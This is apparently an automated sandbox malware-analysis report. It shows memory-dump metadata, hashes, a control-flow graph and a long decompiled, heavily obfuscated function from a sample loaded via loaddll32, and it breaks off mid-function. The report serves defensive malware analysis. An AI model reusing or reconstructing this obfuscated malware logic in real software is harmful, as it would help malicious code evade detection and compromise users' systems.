                                                                                                                                                                            0x02f620f3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f61f20
                                                                                                                                                                            0x02f61f20
                                                                                                                                                                            0x02f61f22
                                                                                                                                                                            0x02f62038
                                                                                                                                                                            0x02f6203d
                                                                                                                                                                            0x02f62045
                                                                                                                                                                            0x02f62047
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f61f28
                                                                                                                                                                            0x02f61f28
                                                                                                                                                                            0x02f61f2e
                                                                                                                                                                            0x02f61ffc
                                                                                                                                                                            0x02f62003
                                                                                                                                                                            0x02f61c7c
                                                                                                                                                                            0x02f61c7c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f61c7c
                                                                                                                                                                            0x02f61f34
                                                                                                                                                                            0x02f61f34
                                                                                                                                                                            0x02f61f3a
                                                                                                                                                                            0x02f61f86
                                                                                                                                                                            0x02f61fb6
                                                                                                                                                                            0x02f61fbd
                                                                                                                                                                            0x02f61fcc
                                                                                                                                                                            0x02f61fce
                                                                                                                                                                            0x02f61fd3
                                                                                                                                                                            0x02f61fd8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f61f3c
                                                                                                                                                                            0x02f61f3c
                                                                                                                                                                            0x02f61f3e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f61f44
                                                                                                                                                                            0x02f61f6f
                                                                                                                                                                            0x02f61f71
                                                                                                                                                                            0x02f61f76
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f61f76
                                                                                                                                                                            0x02f61f3e
                                                                                                                                                                            0x02f61f3a
                                                                                                                                                                            0x02f61f2e
                                                                                                                                                                            0x02f61f22
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6210a
                                                                                                                                                                            0x02f6210a
                                                                                                                                                                            0x02f6210a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f62116
                                                                                                                                                                            0x02f61c86
                                                                                                                                                                            0x02f61c81

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0H\$2^~$D)/$KN$Na$$R$SG<$Xn!$buV$inpG$inpG$jW$nB[N$o]n$x$y.n$2f$]
                                                                                                                                                                            • API String ID: 0-421492616
                                                                                                                                                                            • Opcode ID: b3d1cd31a6e715551d307afc3544603fca6162e80f3c4d0bea1a926663ebec75
                                                                                                                                                                            • Instruction ID: 335c2da19227c9959212754c5f6e46b86371c1dc0c1f15825b826e14dd866d95
                                                                                                                                                                            • Opcode Fuzzy Hash: b3d1cd31a6e715551d307afc3544603fca6162e80f3c4d0bea1a926663ebec75
                                                                                                                                                                            • Instruction Fuzzy Hash: 89920E715093818FD378CF65C98AB9BBBE2FBC4744F10891DE69A86260D7B18949CF43
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 410 2f62e5d-2f63934 411 2f6393f 410->411 412 2f63944-2f6394a 411->412 413 2f63be6-2f63be8 412->413 414 2f63950 412->414 417 2f63bee-2f63bf4 413->417 418 2f63ca8-2f63d48 call 2f64244 call 2f6e1ac call 2f6fecb 413->418 415 2f63956-2f6395c 414->415 416 2f63ba5-2f63be1 call 2f5c5d8 414->416 419 2f63b62-2f63b9b call 2f6cca0 call 2f5e404 415->419 420 2f63962-2f63968 415->420 416->412 422 2f63bf6-2f63bfc 417->422 423 2f63c69-2f63c98 call 2f5c5d8 417->423 443 2f63d4d-2f63d53 418->443 419->416 428 2f6396e-2f63974 420->428 429 2f63b2d-2f63b5d call 2f6c9b0 420->429 425 2f63c20-2f63c5f call 2f6cca0 call 2f5e404 422->425 426 2f63bfe-2f63c04 422->426 452 2f63c9e 423->452 453 2f63a18-2f63a22 423->453 425->423 433 2f63d5e-2f63d80 call 2f72b09 426->433 434 2f63c0a-2f63c10 426->434 438 2f63a96-2f63acf call 2f6cca0 428->438 439 2f6397a-2f63980 428->439 429->411 433->453 442 2f63c16-2f63c1b 434->442 434->443 466 2f63ad1-2f63ae5 438->466 467 2f63ae8-2f63b28 call 2f6cca0 call 2f5e404 438->467 447 2f63986-2f6398c 439->447 448 2f63a23-2f63a85 call 2f6e1f8 call 2f731aa call 2f6fecb 439->448 442->412 443->412 455 2f63d59 443->455 447->443 457 2f63992-2f63a11 call 2f64244 call 2f53325 call 2f6fecb 447->457 479 2f63a8a-2f63a91 448->479 452->418 455->433 457->453 466->467 467->479 479->411
                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                            			E02F62E5D(int __ecx, signed int __edx) {
                                                                                                                                                                            				char _v128;
                                                                                                                                                                            				char _v256;
                                                                                                                                                                            				char _v288;
                                                                                                                                                                            				intOrPtr _v292;
                                                                                                                                                                            				signed int _v296;
                                                                                                                                                                            				signed int _v300;
                                                                                                                                                                            				signed int _v304;
                                                                                                                                                                            				signed int _v308;
                                                                                                                                                                            				signed int _v312;
                                                                                                                                                                            				signed int _v316;
                                                                                                                                                                            				signed int _v320;
                                                                                                                                                                            				signed int _v324;
                                                                                                                                                                            				signed int _v328;
                                                                                                                                                                            				signed int _v332;
                                                                                                                                                                            				signed int _v336;
                                                                                                                                                                            				signed int _v340;
                                                                                                                                                                            				signed int _v344;
                                                                                                                                                                            				unsigned int _v348;
                                                                                                                                                                            				signed int _v352;
                                                                                                                                                                            				signed int _v356;
                                                                                                                                                                            				signed int _v360;
                                                                                                                                                                            				signed int _v364;
                                                                                                                                                                            				signed int _v368;
                                                                                                                                                                            				signed int _v372;
                                                                                                                                                                            				signed int _v376;
                                                                                                                                                                            				signed int _v380;
                                                                                                                                                                            				signed int _v384;
                                                                                                                                                                            				signed int _v388;
                                                                                                                                                                            				signed int _v392;
                                                                                                                                                                            				unsigned int _v396;
                                                                                                                                                                            				signed int _v400;
                                                                                                                                                                            				signed int _v404;
                                                                                                                                                                            				signed int _v408;
                                                                                                                                                                            				signed int _v412;
                                                                                                                                                                            				signed int _v416;
                                                                                                                                                                            				signed int _v420;
                                                                                                                                                                            				signed int _v424;
                                                                                                                                                                            				signed int _v428;
                                                                                                                                                                            				signed int _v432;
                                                                                                                                                                            				signed int _v436;
                                                                                                                                                                            				signed int _v440;
                                                                                                                                                                            				signed int _v444;
                                                                                                                                                                            				signed int _v448;
                                                                                                                                                                            				signed int _v452;
                                                                                                                                                                            				signed int _v456;
                                                                                                                                                                            				signed int _v460;
                                                                                                                                                                            				signed int _v464;
                                                                                                                                                                            				signed int _v468;
                                                                                                                                                                            				signed int _v472;
                                                                                                                                                                            				unsigned int _v476;
                                                                                                                                                                            				int _v480;
                                                                                                                                                                            				signed int _v484;
                                                                                                                                                                            				signed int _v488;
                                                                                                                                                                            				signed int _v492;
                                                                                                                                                                            				signed int _v496;
                                                                                                                                                                            				signed int _v500;
                                                                                                                                                                            				signed int _v504;
                                                                                                                                                                            				signed int _v508;
                                                                                                                                                                            				signed int _v512;
                                                                                                                                                                            				signed int _v516;
                                                                                                                                                                            				signed int _v520;
                                                                                                                                                                            				signed int _v524;
                                                                                                                                                                            				signed int _v528;
                                                                                                                                                                            				unsigned int _v532;
                                                                                                                                                                            				signed int _v536;
                                                                                                                                                                            				signed int _v540;
                                                                                                                                                                            				signed int _v544;
                                                                                                                                                                            				signed int _v548;
                                                                                                                                                                            				unsigned int _v552;
                                                                                                                                                                            				signed int _v556;
                                                                                                                                                                            				signed int _v560;
                                                                                                                                                                            				signed int _v564;
                                                                                                                                                                            				signed int _v568;
                                                                                                                                                                            				signed int _v572;
                                                                                                                                                                            				unsigned int _v576;
                                                                                                                                                                            				void* _t707;
                                                                                                                                                                            				void* _t708;
                                                                                                                                                                            				signed int _t718;
                                                                                                                                                                            				signed int _t732;
                                                                                                                                                                            				signed int _t737;
                                                                                                                                                                            				int _t740;
                                                                                                                                                                            				void* _t742;
                                                                                                                                                                            				void* _t750;
                                                                                                                                                                            				signed int _t752;
                                                                                                                                                                            				signed int _t758;
                                                                                                                                                                            				signed int _t768;
                                                                                                                                                                            				signed int _t769;
                                                                                                                                                                            				intOrPtr _t770;
                                                                                                                                                                            				int _t774;
                                                                                                                                                                            				signed int _t786;
                                                                                                                                                                            				void* _t832;
                                                                                                                                                                            				void* _t833;
                                                                                                                                                                            				void* _t836;
                                                                                                                                                                            				void* _t837;
                                                                                                                                                                            				signed int _t844;
                                                                                                                                                                            				signed int _t845;
                                                                                                                                                                            				signed int _t846;
                                                                                                                                                                            				signed int _t847;
                                                                                                                                                                            				signed int _t848;
                                                                                                                                                                            				signed int _t849;
                                                                                                                                                                            				signed int _t850;
                                                                                                                                                                            				signed int _t851;
                                                                                                                                                                            				signed int _t852;
                                                                                                                                                                            				signed int _t853;
                                                                                                                                                                            				signed int _t854;
                                                                                                                                                                            				signed int _t855;
                                                                                                                                                                            				signed int _t856;
                                                                                                                                                                            				signed int _t857;
                                                                                                                                                                            				signed int _t858;
                                                                                                                                                                            				signed int _t859;
                                                                                                                                                                            				signed int _t860;
                                                                                                                                                                            				void* _t861;
                                                                                                                                                                            				void* _t864;
                                                                                                                                                                            				void* _t867;
                                                                                                                                                                            				signed int _t870;
                                                                                                                                                                            				unsigned int* _t871;
                                                                                                                                                                            				void* _t875;
                                                                                                                                                                            
                                                                                                                                                                            				_t774 = __ecx;
                                                                                                                                                                            				_t871 =  &_v576;
                                                                                                                                                                            				_v296 = __edx;
                                                                                                                                                                            				_v480 = __ecx;
                                                                                                                                                                            				_v420 = 0x6e1d72;
                                                                                                                                                                            				_v420 = _v420 << 5;
                                                                                                                                                                            				_v420 = _v420 * 0x3c;
                                                                                                                                                                            				_t864 = 0xffd9b77;
                                                                                                                                                                            				_v420 = _v420 ^ 0x39dcd700;
                                                                                                                                                                            				_v532 = 0x1f7a5f;
                                                                                                                                                                            				_t845 = 0xe;
                                                                                                                                                                            				_v532 = _v532 / _t845;
                                                                                                                                                                            				_v532 = _v532 ^ 0x6f56ef0e;
                                                                                                                                                                            				_v532 = _v532 >> 0xa;
                                                                                                                                                                            				_v532 = _v532 ^ 0x001a3d41;
                                                                                                                                                                            				_v508 = 0xe1e69b;
                                                                                                                                                                            				_v508 = _v508 + 0x2215;
                                                                                                                                                                            				_v508 = _v508 + 0xffff2958;
                                                                                                                                                                            				_v508 = _v508 + 0xffffaa0c;
                                                                                                                                                                            				_v508 = _v508 ^ 0x00efd475;
                                                                                                                                                                            				_v540 = 0xcd1956;
                                                                                                                                                                            				_v540 = _v540 | 0x45240a95;
                                                                                                                                                                            				_t846 = 0x77;
                                                                                                                                                                            				_v540 = _v540 * 0x18;
                                                                                                                                                                            				_v540 = _v540 ^ 0x336e332d;
                                                                                                                                                                            				_v540 = _v540 ^ 0xbd574949;
                                                                                                                                                                            				_v484 = 0x334a44;
                                                                                                                                                                            				_v484 = _v484 ^ 0x919eff65;
                                                                                                                                                                            				_v484 = _v484 / _t846;
                                                                                                                                                                            				_v484 = _v484 | 0x2d19544d;
                                                                                                                                                                            				_v484 = _v484 ^ 0x2d3e50ce;
                                                                                                                                                                            				_v436 = 0x66ccc0;
                                                                                                                                                                            				_v436 = _v436 + 0xffffec65;
                                                                                                                                                                            				_t847 = 0x52;
                                                                                                                                                                            				_v436 = _v436 * 0x24;
                                                                                                                                                                            				_v436 = _v436 ^ 0x0e7c9935;
                                                                                                                                                                            				_v492 = 0x2c49e8;
                                                                                                                                                                            				_v492 = _v492 << 6;
                                                                                                                                                                            				_v492 = _v492 << 2;
                                                                                                                                                                            				_v492 = _v492 + 0xffff7e7f;
                                                                                                                                                                            				_v492 = _v492 ^ 0x2c4d1795;
                                                                                                                                                                            				_v348 = 0xb21165;
                                                                                                                                                                            				_v348 = _v348 >> 0xb;
                                                                                                                                                                            				_v348 = _v348 ^ 0x000033e8;
                                                                                                                                                                            				_v464 = 0x27371d;
                                                                                                                                                                            				_v464 = _v464 / _t847;
                                                                                                                                                                            				_v464 = _v464 + 0xc709;
                                                                                                                                                                            				_v464 = _v464 ^ 0x00086d33;
                                                                                                                                                                            				_v476 = 0xe8a891;
                                                                                                                                                                            				_v476 = _v476 >> 0xf;
                                                                                                                                                                            				_v476 = _v476 + 0xffff587a;
                                                                                                                                                                            				_v476 = _v476 ^ 0xfffd6e16;
                                                                                                                                                                            				_v568 = 0xc76fce;
                                                                                                                                                                            				_v568 = _v568 + 0xbc5c;
                                                                                                                                                                            				_v568 = _v568 * 3;
                                                                                                                                                                            				_v568 = _v568 | 0x5aa2bc40;
                                                                                                                                                                            				_v568 = _v568 ^ 0x5afa6d0d;
                                                                                                                                                                            				_v456 = 0xcc33e1;
                                                                                                                                                                            				_v456 = _v456 ^ 0x6317d795;
                                                                                                                                                                            				_v456 = _v456 | 0x1eb23508;
                                                                                                                                                                            				_v456 = _v456 ^ 0x7ff946e0;
                                                                                                                                                                            				_v560 = 0xede4ef;
                                                                                                                                                                            				_v560 = _v560 + 0xffffe679;
                                                                                                                                                                            				_t848 = 0x70;
                                                                                                                                                                            				_v560 = _v560 / _t848;
                                                                                                                                                                            				_v560 = _v560 << 5;
                                                                                                                                                                            				_v560 = _v560 ^ 0x0043644b;
                                                                                                                                                                            				_v500 = 0x670a53;
                                                                                                                                                                            				_v500 = _v500 | 0x71b65663;
                                                                                                                                                                            				_t849 = 0x2b;
                                                                                                                                                                            				_v500 = _v500 * 0x3d;
                                                                                                                                                                            				_v500 = _v500 + 0xfb01;
                                                                                                                                                                            				_v500 = _v500 ^ 0x27fbe352;
                                                                                                                                                                            				_v460 = 0x5f6e6b;
                                                                                                                                                                            				_v460 = _v460 << 0xe;
                                                                                                                                                                            				_v460 = _v460 | 0xdb801e45;
                                                                                                                                                                            				_v460 = _v460 ^ 0xdb911bcb;
                                                                                                                                                                            				_v404 = 0x155fb3;
                                                                                                                                                                            				_v404 = _v404 + 0x82cf;
                                                                                                                                                                            				_v404 = _v404 | 0x7954f6f3;
                                                                                                                                                                            				_v404 = _v404 ^ 0x79505431;
                                                                                                                                                                            				_v364 = 0x6447e1;
                                                                                                                                                                            				_v364 = _v364 << 4;
                                                                                                                                                                            				_v364 = _v364 ^ 0x064cce00;
                                                                                                                                                                            				_v452 = 0x93f6b7;
                                                                                                                                                                            				_v452 = _v452 | 0x0efbc074;
                                                                                                                                                                            				_v452 = _v452 * 0x74;
                                                                                                                                                                            				_v452 = _v452 ^ 0xca274b72;
                                                                                                                                                                            				_v516 = 0x2e9555;
                                                                                                                                                                            				_v516 = _v516 * 0x4d;
                                                                                                                                                                            				_v516 = _v516 ^ 0x52348c71;
                                                                                                                                                                            				_v516 = _v516 + 0xffff65c2;
                                                                                                                                                                            				_v516 = _v516 ^ 0x5c3ff1c5;
                                                                                                                                                                            				_v556 = 0x4e7cf7;
                                                                                                                                                                            				_v556 = _v556 * 0x30;
                                                                                                                                                                            				_v556 = _v556 ^ 0xab1a74ca;
                                                                                                                                                                            				_v556 = _v556 | 0x39490d7c;
                                                                                                                                                                            				_v556 = _v556 ^ 0xbde6ca21;
                                                                                                                                                                            				_v304 = 0x79a99e;
                                                                                                                                                                            				_v304 = _v304 | 0x92bbf026;
                                                                                                                                                                            				_v304 = _v304 ^ 0x92fabbf2;
                                                                                                                                                                            				_v444 = 0xf2d903;
                                                                                                                                                                            				_v444 = _v444 * 0x13;
                                                                                                                                                                            				_v444 = _v444 << 3;
                                                                                                                                                                            				_v444 = _v444 ^ 0x90370785;
                                                                                                                                                                            				_v388 = 0xce947f;
                                                                                                                                                                            				_v388 = _v388 + 0xf4e6;
                                                                                                                                                                            				_v388 = _v388 + 0xffffe2fa;
                                                                                                                                                                            				_v388 = _v388 ^ 0x00c891aa;
                                                                                                                                                                            				_v440 = 0x3724ee;
                                                                                                                                                                            				_v440 = _v440 ^ 0xc994252f;
                                                                                                                                                                            				_v440 = _v440 + 0xffff9dbe;
                                                                                                                                                                            				_v440 = _v440 ^ 0xc9a5a4c3;
                                                                                                                                                                            				_v544 = 0x9c24f5;
                                                                                                                                                                            				_v544 = _v544 >> 8;
                                                                                                                                                                            				_v544 = _v544 * 0x12;
                                                                                                                                                                            				_v544 = _v544 + 0xb91e;
                                                                                                                                                                            				_v544 = _v544 ^ 0x0007bff8;
                                                                                                                                                                            				_v448 = 0x5ce888;
                                                                                                                                                                            				_v448 = _v448 / _t849;
                                                                                                                                                                            				_v448 = _v448 ^ 0x9d1dcba1;
                                                                                                                                                                            				_v448 = _v448 ^ 0x9d138551;
                                                                                                                                                                            				_v552 = 0x5ae9b7;
                                                                                                                                                                            				_v552 = _v552 + 0xffffcdd3;
                                                                                                                                                                            				_v552 = _v552 >> 0xa;
                                                                                                                                                                            				_v552 = _v552 >> 3;
                                                                                                                                                                            				_v552 = _v552 ^ 0x000286f6;
                                                                                                                                                                            				_v372 = 0x1cfcf8;
                                                                                                                                                                            				_v372 = _v372 << 0x10;
                                                                                                                                                                            				_v372 = _v372 ^ 0xfcf9df5b;
                                                                                                                                                                            				_v572 = 0x7fff3;
                                                                                                                                                                            				_v572 = _v572 << 3;
                                                                                                                                                                            				_v572 = _v572 | 0xc07f6c1b;
                                                                                                                                                                            				_t850 = 0x6c;
                                                                                                                                                                            				_v572 = _v572 / _t850;
                                                                                                                                                                            				_v572 = _v572 ^ 0x01c5e077;
                                                                                                                                                                            				_v468 = 0xb8a28e;
                                                                                                                                                                            				_v468 = _v468 >> 0xa;
                                                                                                                                                                            				_t851 = 7;
                                                                                                                                                                            				_v468 = _v468 * 0x38;
                                                                                                                                                                            				_v468 = _v468 ^ 0x0004661e;
                                                                                                                                                                            				_v472 = 0x1c4be2;
                                                                                                                                                                            				_v472 = _v472 >> 0xb;
                                                                                                                                                                            				_v472 = _v472 / _t851;
                                                                                                                                                                            				_v472 = _v472 ^ 0x000b37fd;
                                                                                                                                                                            				_v324 = 0x397321;
                                                                                                                                                                            				_v324 = _v324 + 0x4649;
                                                                                                                                                                            				_v324 = _v324 ^ 0x003dbcde;
                                                                                                                                                                            				_v564 = 0x90a3d2;
                                                                                                                                                                            				_v564 = _v564 >> 0xf;
                                                                                                                                                                            				_v564 = _v564 | 0x55e281c1;
                                                                                                                                                                            				_v564 = _v564 + 0xffff9c60;
                                                                                                                                                                            				_v564 = _v564 ^ 0x55ec6797;
                                                                                                                                                                            				_v524 = 0x36ce4e;
                                                                                                                                                                            				_v524 = _v524 + 0x9321;
                                                                                                                                                                            				_v524 = _v524 ^ 0x68577083;
                                                                                                                                                                            				_v524 = _v524 + 0x842e;
                                                                                                                                                                            				_v524 = _v524 ^ 0x686a3805;
                                                                                                                                                                            				_v380 = 0xf92015;
                                                                                                                                                                            				_t852 = 0x57;
                                                                                                                                                                            				_v380 = _v380 * 0x31;
                                                                                                                                                                            				_v380 = _v380 ^ 0x2faa62dc;
                                                                                                                                                                            				_v428 = 0xf06949;
                                                                                                                                                                            				_v428 = _v428 ^ 0xe190386e;
                                                                                                                                                                            				_v428 = _v428 | 0xd7c767f0;
                                                                                                                                                                            				_v428 = _v428 ^ 0xf7e62dec;
                                                                                                                                                                            				_v316 = 0x53402;
                                                                                                                                                                            				_v316 = _v316 ^ 0x1a7eacd5;
                                                                                                                                                                            				_v316 = _v316 ^ 0x1a780dc3;
                                                                                                                                                                            				_v396 = 0xea020b;
                                                                                                                                                                            				_v396 = _v396 / _t852;
                                                                                                                                                                            				_v396 = _v396 >> 7;
                                                                                                                                                                            				_v396 = _v396 ^ 0x0007fa92;
                                                                                                                                                                            				_v576 = 0x94f18;
                                                                                                                                                                            				_v576 = _v576 + 0x323;
                                                                                                                                                                            				_t853 = 0x5a;
                                                                                                                                                                            				_v576 = _v576 / _t853;
                                                                                                                                                                            				_v576 = _v576 >> 7;
                                                                                                                                                                            				_v576 = _v576 ^ 0x0009d62c;
                                                                                                                                                                            				_v340 = 0x5ab89e;
                                                                                                                                                                            				_v340 = _v340 + 0xcec5;
                                                                                                                                                                            				_v340 = _v340 ^ 0x005981b9;
                                                                                                                                                                            				_v424 = 0xf4fb06;
                                                                                                                                                                            				_v424 = _v424 << 0xf;
                                                                                                                                                                            				_v424 = _v424 + 0x6e15;
                                                                                                                                                                            				_v424 = _v424 ^ 0x7d84f79d;
                                                                                                                                                                            				_v308 = 0xe5ad48;
                                                                                                                                                                            				_v308 = _v308 + 0xffff809e;
                                                                                                                                                                            				_v308 = _v308 ^ 0x00e6a4ab;
                                                                                                                                                                            				_v432 = 0xc8665e;
                                                                                                                                                                            				_v432 = _v432 | 0xb25d9dfb;
                                                                                                                                                                            				_v432 = _v432 * 0x51;
                                                                                                                                                                            				_v432 = _v432 ^ 0x9835fda6;
                                                                                                                                                                            				_v536 = 0x3c612a;
                                                                                                                                                                            				_v536 = _v536 ^ 0xe3614c8f;
                                                                                                                                                                            				_v536 = _v536 + 0x89b2;
                                                                                                                                                                            				_v536 = _v536 >> 3;
                                                                                                                                                                            				_v536 = _v536 ^ 0x1c61cdd9;
                                                                                                                                                                            				_v312 = 0xb1cab1;
                                                                                                                                                                            				_v312 = _v312 + 0x5335;
                                                                                                                                                                            				_v312 = _v312 ^ 0x00b6c298;
                                                                                                                                                                            				_v332 = 0x3dadc5;
                                                                                                                                                                            				_v332 = _v332 >> 0xf;
                                                                                                                                                                            				_v332 = _v332 ^ 0x00096a38;
                                                                                                                                                                            				_v320 = 0xd2cf6d;
                                                                                                                                                                            				_t854 = 0x5e;
                                                                                                                                                                            				_v320 = _v320 / _t854;
                                                                                                                                                                            				_v320 = _v320 ^ 0x000f4fea;
                                                                                                                                                                            				_v528 = 0xbc9a67;
                                                                                                                                                                            				_t768 = 0x35;
                                                                                                                                                                            				_v528 = _v528 / _t768;
                                                                                                                                                                            				_v528 = _v528 ^ 0x531db0de;
                                                                                                                                                                            				_v528 = _v528 << 2;
                                                                                                                                                                            				_v528 = _v528 ^ 0x4c7ccc72;
                                                                                                                                                                            				_v368 = 0x9c5377;
                                                                                                                                                                            				_v368 = _v368 | 0xa0dcba47;
                                                                                                                                                                            				_v368 = _v368 ^ 0xa0d1bf3f;
                                                                                                                                                                            				_v416 = 0x1ec4a4;
                                                                                                                                                                            				_t855 = 0x79;
                                                                                                                                                                            				_v416 = _v416 * 0x28;
                                                                                                                                                                            				_v416 = _v416 / _t855;
                                                                                                                                                                            				_v416 = _v416 ^ 0x00072384;
                                                                                                                                                                            				_v376 = 0x2ac77;
                                                                                                                                                                            				_v376 = _v376 << 0xf;
                                                                                                                                                                            				_v376 = _v376 ^ 0x563f0855;
                                                                                                                                                                            				_v412 = 0x448f7a;
                                                                                                                                                                            				_v412 = _v412 << 0xd;
                                                                                                                                                                            				_v412 = _v412 >> 2;
                                                                                                                                                                            				_v412 = _v412 ^ 0x24738c34;
                                                                                                                                                                            				_v356 = 0xc97c1e;
                                                                                                                                                                            				_v356 = _v356 ^ 0x373e9b5c;
                                                                                                                                                                            				_v356 = _v356 ^ 0x37f1bea5;
                                                                                                                                                                            				_v548 = 0xc08620;
                                                                                                                                                                            				_t856 = 0x3e;
                                                                                                                                                                            				_v548 = _v548 * 0x48;
                                                                                                                                                                            				_v548 = _v548 >> 0xe;
                                                                                                                                                                            				_v548 = _v548 + 0x8cd4;
                                                                                                                                                                            				_v548 = _v548 ^ 0x00077c97;
                                                                                                                                                                            				_v504 = 0x1bacca;
                                                                                                                                                                            				_v504 = _v504 / _t856;
                                                                                                                                                                            				_v504 = _v504 + 0xffff3533;
                                                                                                                                                                            				_v504 = _v504 + 0xffffc69c;
                                                                                                                                                                            				_v504 = _v504 ^ 0xfffb1415;
                                                                                                                                                                            				_v512 = 0x4f44ee;
                                                                                                                                                                            				_v512 = _v512 + 0x177f;
                                                                                                                                                                            				_v512 = _v512 + 0xce0c;
                                                                                                                                                                            				_v512 = _v512 << 2;
                                                                                                                                                                            				_v512 = _v512 ^ 0x014cc697;
                                                                                                                                                                            				_v360 = 0x8b661;
                                                                                                                                                                            				_t857 = 0x1e;
                                                                                                                                                                            				_v360 = _v360 / _t857;
                                                                                                                                                                            				_v360 = _v360 ^ 0x000dc15c;
                                                                                                                                                                            				_v520 = 0xb38031;
                                                                                                                                                                            				_v520 = _v520 | 0xa1714482;
                                                                                                                                                                            				_t858 = 0x36;
                                                                                                                                                                            				_t870 = _v296;
                                                                                                                                                                            				_v520 = _v520 * 0x52;
                                                                                                                                                                            				_v520 = _v520 + 0xc23a;
                                                                                                                                                                            				_v520 = _v520 ^ 0xe016b971;
                                                                                                                                                                            				_v496 = 0x319ddd;
                                                                                                                                                                            				_v496 = _v496 / _t858;
                                                                                                                                                                            				_t859 = 0x3b;
                                                                                                                                                                            				_t860 = _v296;
                                                                                                                                                                            				_v496 = _v496 / _t859;
                                                                                                                                                                            				_v496 = _v496 + 0xffffa02a;
                                                                                                                                                                            				_v496 = _v496 ^ 0xfff3e4c0;
                                                                                                                                                                            				_v352 = 0x3691e9;
                                                                                                                                                                            				_t769 = _v296;
                                                                                                                                                                            				_v352 = _v352 / _t768;
                                                                                                                                                                            				_v352 = _v352 ^ 0x000e8b32;
                                                                                                                                                                            				_v408 = 0x2ac6b;
                                                                                                                                                                            				_v408 = _v408 * 0x5a;
                                                                                                                                                                            				_v408 = _v408 << 9;
                                                                                                                                                                            				_v408 = _v408 ^ 0xe13230fa;
                                                                                                                                                                            				_v392 = 0x204939;
                                                                                                                                                                            				_v392 = _v392 + 0x4ed4;
                                                                                                                                                                            				_v392 = _v392 * 0x35;
                                                                                                                                                                            				_v392 = _v392 ^ 0x06bd0f48;
                                                                                                                                                                            				_v336 = 0x1179fc;
                                                                                                                                                                            				_v336 = _v336 + 0xffff73d1;
                                                                                                                                                                            				_v336 = _v336 ^ 0x0013f977;
                                                                                                                                                                            				_v400 = 0xb07871;
                                                                                                                                                                            				_v400 = _v400 >> 3;
                                                                                                                                                                            				_v400 = _v400 | 0xc580b254;
                                                                                                                                                                            				_v400 = _v400 ^ 0xc59d0b5c;
                                                                                                                                                                            				_v344 = 0x9fe4dd;
                                                                                                                                                                            				_v344 = _v344 << 0xe;
                                                                                                                                                                            				_v344 = _v344 ^ 0xf932a85a;
                                                                                                                                                                            				_v328 = 0xd2ff81;
                                                                                                                                                                            				_v328 = _v328 ^ 0x82aa1598;
                                                                                                                                                                            				_v328 = _v328 ^ 0x827d602f;
                                                                                                                                                                            				_v488 = 0x92e76b;
                                                                                                                                                                            				_v488 = _v488 | 0x6946c4e8;
                                                                                                                                                                            				_v488 = _v488 + 0xbbca;
                                                                                                                                                                            				_v488 = _v488 * 0x54;
                                                                                                                                                                            				_v488 = _v488 ^ 0xbac9f786;
                                                                                                                                                                            				_v384 = 0xafba80;
                                                                                                                                                                            				_v384 = _v384 ^ 0x0a481803;
                                                                                                                                                                            				_v384 = _v384 << 6;
                                                                                                                                                                            				_v384 = _v384 ^ 0xb9e44209;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					L1:
                                                                                                                                                                            					_t707 = 0x9c71ab3;
                                                                                                                                                                            					do {
                                                                                                                                                                            						while(1) {
                                                                                                                                                                            							L2:
                                                                                                                                                                            							_t875 = _t864 - 0x86fed85;
                                                                                                                                                                            							if(_t875 <= 0) {
                                                                                                                                                                            								break;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _t864 - _t707;
                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                            								_push(_v432);
                                                                                                                                                                            								_t770 = _t860 + _t870;
                                                                                                                                                                            								_push(_v308);
                                                                                                                                                                            								_push(0x2f51808);
                                                                                                                                                                            								_v292 = _t770;
                                                                                                                                                                            								_t708 = E02F64244(_v340, _v424, __eflags);
                                                                                                                                                                            								__eflags = _t770 - _t870;
                                                                                                                                                                            								_t769 = E02F6E1AC(_v536, _t770 - _t870, _t870,  &_v256, _v312,  &_v288, _v332,  &_v128, _v320, _t770 - _t870) + _t870;
                                                                                                                                                                            								E02F6FECB(_t708, _v528, _v368, _v416, _v376);
                                                                                                                                                                            								_t774 = _v480;
                                                                                                                                                                            								_t871 =  &(_t871[0xe]);
                                                                                                                                                                            								_t864 = 0x1bf95f7;
                                                                                                                                                                            								_t707 = 0x9c71ab3;
                                                                                                                                                                            								goto L31;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _t864 - 0xe33788a;
                                                                                                                                                                            							if(_t864 == 0xe33788a) {
                                                                                                                                                                            								_t860 = 0x4000;
                                                                                                                                                                            								_push(_t774);
                                                                                                                                                                            								_push(_t774);
                                                                                                                                                                            								_t758 = E02F5C5D8(0x4000);
                                                                                                                                                                            								_t871 =  &(_t871[3]);
                                                                                                                                                                            								_v300 = _t758;
                                                                                                                                                                            								__eflags = _t758;
                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                            									return _t758;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t864 = 0x77316ed;
                                                                                                                                                                            								L14:
                                                                                                                                                                            								_t774 = _v480;
                                                                                                                                                                            								while(1) {
                                                                                                                                                                            									L1:
                                                                                                                                                                            									_t707 = 0x9c71ab3;
                                                                                                                                                                            									goto L2;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _t864 - 0xf34fc82;
